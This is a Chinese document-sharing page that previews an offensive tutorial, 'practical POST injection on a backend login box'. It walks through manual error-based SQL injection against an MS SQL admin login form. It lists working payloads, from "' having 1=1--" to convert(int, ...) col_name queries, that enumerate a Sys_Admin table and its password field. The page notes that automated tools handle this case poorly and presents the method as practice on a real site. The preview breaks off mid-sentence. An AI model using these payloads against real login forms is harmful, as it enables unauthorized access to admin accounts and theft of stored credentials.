1 / 3
文档名称:

后台登陆框post注入实战.docx

格式:docx   大小:182KB   页数:3页
下载后只包含 1 个 DOCX 格式的文档,没有任何的图纸或源代码,查看文件列表

如果您已付费下载过本站文档,您可以点这里二次下载

分享

预览

后台登陆框post注入实战.docx

上传人:jianjian401 2017/2/27 文件大小:182 KB

下载得到文件列表

后台登陆框post注入实战.docx

文档介绍

文档介绍:后台登陆框 post 注入实战后台登陆框 post 注入按照注入的方式属于 post ,和前台搜索型 post 注入、文本框注入类似,由于目前主流的注入工具除了穿山甲等较新工具以外几乎都是 get 注入,尤其是对于这种后台账户型 pos t 注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说明一下大家不大在意的 pos t 注入的手注方法。(以后也会补充一个 cookie 注入的实战例子) / 1. 爆数据库的表段和相关字段' having 1=1-- 说明有表名叫 Sys_Admin 字段有 password Sys_Admin 下的其他字段。' group by having 1=1-- 不知道为何没法用这种方式继续爆表段的其他字段失败。 3 换种方式爆 Sys_Admin 表段的其他字段 1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1 1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1 这就是我们一开始就和表段一起爆出来的密码字段。 1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1 在将 nvarchar 值'Name' 转换成数据类型 int 时失败。由结果可以推断